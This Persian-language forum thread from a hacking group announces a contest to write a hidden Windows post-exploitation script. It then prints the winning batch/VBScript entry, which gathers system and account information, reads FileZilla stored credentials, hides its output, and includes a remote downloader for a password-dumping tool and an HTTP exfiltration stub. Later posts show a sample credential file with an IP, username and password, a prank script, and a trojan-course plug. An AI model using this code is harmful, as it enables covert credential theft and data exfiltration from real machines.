انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
دوره آموزشی آشیانه آدرس رسمی کانال تلگرام گروه آشیانه
انجمن آموزشی لینوکس سیسکو ویپ استریسک الستیکس میکروتیک آشیانه هاست ارائه دهنده میزبانی وب امن؛ سرورهای اختصاصی و مجازی
نمایش نتایج: از 1 به 5 از 5

موضوع: امنیت سیستم عامل مسابقه شماره(۱)[windows]

  1. Top | #1

    تاریخ عضویت
    Mar 2012
    میانگین پست در روز
    1.18
    نوشته ها
    2,260
    تشکر
    5,996
    تشکر شده 14,434 بار در 2,114 ارسال
    ميزان امتياز: 20510Array

    امنیت سیستم عامل مسابقه شماره(۱)[windows]

    سلام دوستان
    پیشاپیش ماه محرم به تمامی دوستان تسلیت میگم و از همگی دوستان التماس دعا دارم.
    مسابقه همراه با جایزه است
    با توجه به استقبال دوستان جوایز از امتیاز و ارتقا به رنک یوزر اشیانه قابل تغییر خواهد بود ...

    قبل از هر چیز این سری مسابقات مربوط میشه به زیر بخش های امنیت سیستم عامل های ویندوز و لینوکس و طبق روال گذاشته برای دوستان که موارد خواسته شده در مسابقه را به پایان برسانند جوایز در نظر گرفته شده و تقدیم خواهد شد.
    بریم سراغ اصل مطلب که مسابقه هست تصمیم دارم اول سطح انجمن تو بحث سیستم عامل بسنجم و به ترتیب سطح مسابقه بالاتر ببریم و جوایز بیشتر و بیشتر شوند.
    درخواست ما در این مسابقه نوشتن اسکریپت با مشخصات زیر این قسمت ما فقط برای شروع سیستم عامل ویندوز و با نگاه به workgroup بودن اسکریپت را خواستیم پس اسکریپت شما اگر با یوزر دامین اجرا بشه نباید کار بکنه اولین نکته مسابقه است !
    ۱-اسکریپت بهتر است به زبان پاورشل باشد چون روی سیستم عامل ویندوز خام تست خواهد شد.
    ۲-اسکریپت باید تشخیص دهد در شبکه workgroup یا domain اجرا شده است .
    ۳-اسم یوزری که آن را اجرا کرده است سطح دسترسی آن به سیستم عامل
    ۴-لیست یوزرهای موجود در سیستم عامل لیست یوزرهای ادمین در سیستم عامل
    ۵-فایل حساس در سیستم عامل ما از اسکریپت می خواهیم فایل هایی که در آن ها string خاص security یا password به کار برد فایل را برای ما به طریقی ارسال کند مثل smtp
    ۶- لیست share در سیستم عامل
    ۷-لیست برنامه های نصب شده در سیستم عامل
    ۸-dump اطلاعات ذخیره شده از قبیل پسورد های مرورگرها history ها بدست اوردن ریموت دسکتاپ هایی که از طریق سیستم عامل زده شده بدست اوردن عباراتی که در explorer سرچ شده.
    ۹-ورژن سیستم عامل
    ۱۰-ورژن دات نت نصب شده در سیستم عامل
    ۱۱-hotfix های نصب شده بر روی سیستم عامل
    ۱۲-job and task های روی سیستم عامل
    ۱۳-result از group policy سیستم عامل
    ۱۴-لیست سرویس های موجود روی سیستم عامل + لیست پراسس های روی سیستم عامل
    ۱۵-ip سیستم عامل یا ip ها
    ۱۶-route های موجود روی سیستم عامل
    ۱۷-DNS سرور سیستم عامل
    ۱۸-پورت های باز روی سیستم عامل
    دوستان این موارد شاید شما در اینترنت پیدا کنید مهم اسکریپت زدن شما و اصولی نوشتن اسکریپت چک کردن شرایط دسترسی ادمین برای اجرا کامندهای که نیازمند دسترسی ادمین هستند این موارد حتما در اسکریپت های ارسالی شما بررسی خواهد شد
    نتایج اسکریپت را در
    c:\temp\ashiyane\ashiyanepost.txt
    بریزید و یک راه برای ارسال به بیرون استفاده کنید فایل ashiyane حتما hiddenشود دیده نشود !
    راه بیرون فرستادن اختیاری است
    ایمیل کردن
    ftpکردن
    tftp کردن

    برای ایمیل کردن توسط پاورشل می توانید از تاپیک زیر استفاده نمایید
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    هر جور که دوست دارید راه های ابتکاری امتیاز خاص منظور میشه
    می توانید با python بزنید ولی امتیاز مقداری کم می شود!
    یک نمونه اسکریپت مورد قابل قبول برای مسابقه:
    کد:
    #ashiyane post exploit version 0.1
    #writen by xenotix
    #create on 1 october 
    write-host “user info post exploit ….”
    #user shoma  chist che distresi hai darid ?
    whoami /a > c:\temp\ashiyane\ashiyanepost.txt
    #user hai mojod dar windows !
    net user >>c:\temp\ashiyane\ashiyanepost.txt
    ارزوی موفقیت برای تمامی دوستان./
    افرادی که اسکریپتشان بررسی شده و پذیرفته شده است:
    criss21
    4TT4CK3R
    ویرایش توسط xenotix : 10-04-2016 در ساعت 09:46 PM
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]


  2.  

  3. Top | #2

    تاریخ عضویت
    Mar 2012
    میانگین پست در روز
    1.18
    نوشته ها
    2,260
    تشکر
    5,996
    تشکر شده 14,434 بار در 2,114 ارسال
    ميزان امتياز: 20510Array
    سلام دوستان
    مدت پایان این ازمون تا تاریخ 13 مهر می باشد.
    برای ارسال اسکریپت ؛ نامه ای با عنوان os vul(1)[windows] ارسال نمایید./
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  4. 23 کاربر مقابل از xenotix عزیز به خاطر این پست مفید تشکر کرده اند.


  5. Top | #3

    تاریخ عضویت
    Mar 2012
    میانگین پست در روز
    1.18
    نوشته ها
    2,260
    تشکر
    5,996
    تشکر شده 14,434 بار در 2,114 ارسال
    ميزان امتياز: 20510Array
    تبریک میگم به دوستان برنده هر دو اسکریپت که فرستاده شده تقریبا کامل بودن اما اسکریپت دوست عزیزمون [برای مشاهده لینک ها شما باید عضو سایت باشید ] کامل تر + خلاقیت برای ارسال اطلاعات بیرون از تارگت بود به زودی جوایز این دوستان اعمال خواهد شد.
    ارادتمند./
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  6. 19 کاربر مقابل از xenotix عزیز به خاطر این پست مفید تشکر کرده اند.


  7. Top | #4

    تاریخ عضویت
    Jan 2013
    میانگین پست در روز
    0.45
    محل سکونت
    %~dp0
    نوشته ها
    730
    تشکر
    6,454
    تشکر شده 2,982 بار در 534 ارسال
    ميزان امتياز: 5436Array
    با سلام خدمت دوستان و تشکر از زحمات xenotix عزیز

    در مورد اسکریپت لازم هست که توضیحاتی رو بدم :
    اسکریپت بصورت Batchfile نوشته ، در واقع فایلی که باید اجرا بشه با پسوند .Bat هست بعضی جاها نیاز بوده که از Vbscript استفاده بشه که توی همون BatchFile با استفاده از دستور echo خط به خط یک اسکریپت رو وارد یک فایل با پسود .vbs میکردیم که یک Vbscript هست ، برای مثال برای ساخت یک دانلودر

    البته بهتر بود که این اسکریپت از همون اول با Vbscript نوشته بشه به دلیل اینکه موقع اجرا هیچ سروصدایی نداره

    در مورد اینکه چطور اطلاعات به بیرون ارسال میشد این هست که از Smtp و Ftp و سایر روش ها استفاده نشده ، و یک روش که بنظرم جالب رو استفاده کردم و اون هم ارسال درخواست بصورت Get به یک لینک PHP هست ، که البته نیاز هست دستورات لازم برای PHP هم نوشته بشه که در اینجا توضیح داده نمیشه ، اما یک نمونه اسکریپت که چگونه درخواست بصورت GET بفرستید رو قرار میدم

    این اسکریپتی بود که برای مسابقه ارسال شد :
    کد HTML:
    ::ashiyane post exploit version 0.0
    ::writen by criss21
    ::create on 3 october
    ::NotePad++
    ::this script must Do 1 to 18 task (num 1. this Script is BatchFile + VbScript)
    ::start http://ashiyane.org/forums/showthread.php?167653
    
    @echo off
    ::Options
    TITLE Ashiyane_Criss21
    color 3f
    
    md c:\temp\ashiyane
    attrib +h +r +s c:\temp\ashiyane
    
    ::need to override Data
    ::agar az ghabl in file ha vojood dashte bashand script kar nakhahad kard
    attrib -h -r -s c:\temp\ashiyane\ashiyanepost.txt
    attrib -h -r -s c:\temp\ashiyane\pass.txt
    
    
    echo "#----------2.DOMAIN_OR_WORKGROUP_INFO----------#" > c:\temp\ashiyane\ashiyanepost.txt
    systeminfo | findstr /B /C:"Domain" >> c:\temp\ashiyane\ashiyanepost.txt
    wmic computersystem get domain >> c:\temp\ashiyane\ashiyanepost.txt
    echo "userdomain : "  %userdomain% >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------2.3.4.USERNAME_INFO----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    whoami >> c:\temp\ashiyane\ashiyanepost.txt
    hostname >> c:\temp\ashiyane\ashiyanepost.txt
    net user "%username%" | find /i "last logon" >> c:\temp\ashiyane\ashiyanepost.txt
    echo "USERNAME : " "%username%" >> c:\temp\ashiyane\ashiyanepost.txt
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    net user >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------5.PASSWORD_SECURITY_STRING----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    ::ForTest
    for /f "tokens=* delims=" %%x in (sitemanager.xml) do echo %%x >> c:\temp\ashiyane\ashiyanepost.txt
    for /f "tokens=* delims=" %%x in (%APPDATA%\FileZilla\sitemanager.xml) do echo %%x >> c:\temp\ashiyane\ashiyanepost.txt
    for /f "tokens=* delims=" %%x in (C:\Documents" "and" "Settings\"%username%"\Application" "Data\FileZilla\sitemanager.xml) do echo %%x >> c:\temp\ashiyane\ashiyanepost.txt
    for /f "tokens=* delims=" %%x in (C:\Users\"%username%"\AppData\Roaming\FileZilla\sitemanager.xml) do echo %%x >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------6.SHARED_FOLDER----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    net share >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------7.SOFTWARE_LIST----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    dir /b "C:/Program Files" >> c:\temp\ashiyane\ashiyanepost.txt
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    dir /b "C:/Program Files (x86)" >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------8.BROWSER_PASSWORDS----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    ::THIS_DOWNLOADER_NEED_TO_DECRYPT
    ::in downloader tavasote anri virus ha gerefte mishe va man ghast nadaram on ro makhfi konam
    :: file ro ghabl az test dar c:\temp\ashiyane\criss21.msc gharar dahid
    
    ::echo On Error Resume Next > c:\temp\ashiyane\ashiyanepost.vbs
    ::echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo xHttp.Open "GET", "http://up.ashiyane.org/images/c1jyjpoku43zjj4t0mzr.zip", False >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo xHttp.Send >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo with bStrm >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo .type = 1 >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo .open >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo .write xHttp.responseBody >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo .savetofile "c:\temp\ashiyane\criss21.msc", 2 >> c:\temp\ashiyane\ashiyanepost.vbs
    ::echo end with >> c:\temp\ashiyane\ashiyanepost.vbs
    
    ::if exist c:\temp\ashiyane\ashiyanepost.vbs start c:\temp\ashiyane\ashiyanepost.vbs
    ::need to download complite
    ping 127.0.0.1 -n 10
    c:\temp\ashiyane\criss21.msc /stext c:\temp\ashiyane\pass.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------9.OS_VERSION----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    wmic os get version >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------10.NET_Framework_VERSION----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Version >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------11.HOTFIX----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    systeminfo >> c:\temp\ashiyane\ashiyanepost.txt
    
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------12.TASKLIST----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    tasklist >> c:\temp\ashiyane\ashiyanepost.txt
    
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------13.GROUP_POLICY----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    GPRESULT /R >> c:\temp\ashiyane\ashiyanepost.txt
    GPRESULT /V >> c:\temp\ashiyane\ashiyanepost.txt
    GPRESULT /Z >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------14.SERVICES_LIST----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    sc query >> c:\temp\ashiyane\ashiyanepost.txt 
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------15.16.17.IP_ROUTE_DNS ----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    ::ipconfig /all >> c:\temp\ashiyane\ashiyanepost.txt
    
    ipconfig/all | find "Subnet Mask" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "IPv4"  >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "Default Gateway" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "Host Name" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "DNS Suffix Search List" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "Physical Address" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "DHCP Enabled" >> c:\temp\ashiyane\ashiyanepost.txt
    ipconfig/all | find "DHCP Server" >> c:\temp\ashiyane\ashiyanepost.txt
    
    nslookup localhost 2>nul | find "Address:" >> c:\temp\ashiyane\ashiyanepost.txt
    
    echo. >> c:\temp\ashiyane\ashiyanepost.txt
    echo "#----------18.PORTS----------#" >> c:\temp\ashiyane\ashiyanepost.txt
    netstat -an >> c:\temp\ashiyane\ashiyanepost.txt
    
    
    ::--------------------HIDE_RESULT-----------
    attrib +h +r +s c:\temp\ashiyane\ashiyanepost.txt
    attrib +h +r +s c:\temp\ashiyane\pass.txt
    
    start c:\temp\ashiyane\pass.txt
    start c:\temp\ashiyane\ashiyanepost.txt
    
    ::--------------------SEND_TO_SERVER_PHP-----------
    ::SEND_TO_SERVER_SMTP : 
    
    echo Dim o > c:\temp\ashiyane\php.vbs
    echo Set o = CreateObject("MSXML2.XMLHTTP")  >> c:\temp\ashiyane\php.vbs
    echo o.open "GET", "http://www.example.com", False >> c:\temp\ashiyane\php.vbs
    echo o.send >> c:\temp\ashiyane\php.vbs
    echo msgbox o.responseText >> c:\temp\ashiyane\php.vbs
    
    
    
    pause

    اگه دوست داری در عرض یک هفته بتونی یه تروجان طراحی کنی آموزش زیر رو دنبال کن
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    کد زیر رو تویNOTEPAD کپی کن و با پسوند .VBS ذخیره کن بعد از اجرا اگه خوشت اومد میتونی بقیشو توی تایپک زیر یاد بگیری
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    کد PHP:
    Set objVoice CreateObject("SAPI.SpVoice")
    objVoice.Speak "your system is mine -   - and you dont have any thing"
    objVoice.Speak "Ha  Ha  Ha Ha   -   - Ha  Ha  Ha Ha" 
    به سری دلایلی دیگه سوالاتی که پیام خصوصی فرستاده میشه جواب نمیدم

  8. 23 کاربر مقابل از criss21 عزیز به خاطر این پست مفید تشکر کرده اند.


  9. Top | #5

    تاریخ عضویت
    Jan 2013
    میانگین پست در روز
    0.45
    محل سکونت
    %~dp0
    نوشته ها
    730
    تشکر
    6,454
    تشکر شده 2,982 بار در 534 ارسال
    ميزان امتياز: 5436Array
    در مورد قسمت 5 که فایل sitemanager.xml برای FileZilla هست که user و Password رو بصورت PlaintText ذخیره میکنه بصورت زیر :
    کد HTML:
    <Server>
                <Host>63.254.248.203</Host>
                <Port>21</Port>
                <Protocol>0</Protocol>
                <Type>0</Type>
                <User>ddklik</User>
                <Pass>CLid^5d!!</Pass>
                <Logontype>1</Logontype>
                <TimezoneOffset>0</TimezoneOffset>
                <PasvMode>MODE_DEFAULT</PasvMode>
                <MaximumMultipleConnections>0</MaximumMultipleConnections>
                <EncodingType>Auto</EncodingType>
                <BypassProxy>0</BypassProxy>
            </Server>
    که با استفاده از دستوری که در قسمت 5 میبینید خط به خط خونده میشه و در فایل ما ذخیره میشه


    در مورد قسمت 8 یک دانلود که با vbscript هست رو میسازیم که یک فایل رو دانلود کنه ، البته چون این دانلود توسط آنتی ویروس گرفته میشه اون رو کامنت کردم ، البته روش هایی وجود داره که میشه اون رو دیکریپت هم کرد به هر حال برای گرفتم پسوردهای ذخیره شده در کوکی باید ابزار خودتون رو روی سیستم بیارید


    در مرحله آخری که فقط یک Vbscript ساخته میشه که نشون میده چطور یک درخواست رو بصورت GET به یک فایل PHP ارسال کنید و حتی محتوی رو دریافت کنید <

    کافیه به روشی که در مورد 5 محتوای sitemanager.xml خونده شد ، محتوی دریافت بشه و به PHP خط به خط ارسال بشه

    کد HTML:
    Dim o
    Set o = CreateObject("MSXML2.XMLHTTP")
    o.open "GET", "http://www.example.com", False
    o.send
    msgbox o.responseText

    اگه دوست داری در عرض یک هفته بتونی یه تروجان طراحی کنی آموزش زیر رو دنبال کن
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    کد زیر رو تویNOTEPAD کپی کن و با پسوند .VBS ذخیره کن بعد از اجرا اگه خوشت اومد میتونی بقیشو توی تایپک زیر یاد بگیری
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    کد PHP:
    Set objVoice CreateObject("SAPI.SpVoice")
    objVoice.Speak "your system is mine -   - and you dont have any thing"
    objVoice.Speak "Ha  Ha  Ha Ha   -   - Ha  Ha  Ha Ha" 
    به سری دلایلی دیگه سوالاتی که پیام خصوصی فرستاده میشه جواب نمیدم

  10. 20 کاربر مقابل از criss21 عزیز به خاطر این پست مفید تشکر کرده اند.


مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  
شبکه های اجتماعی
تلفن های شرکت
شماره های تماس: 6-88749724-021
درباره گروه امنیتی آشیانه

گروه امنیتی آشیانه گروهی شخصی و کاملا مستقل بوده و به تائید سایت معتبر Alexa اولین و بزرگترین سایت امنیت شبکه در ایران است. همچنین کلیه حقوق اطلاعات و مقالات در این سایت متعلق به گروه امنیتی آشیانه بوده و هرگونه نسخه برداری از آن بدون ذکر منبع پیگرد قانونی خواهد داشت.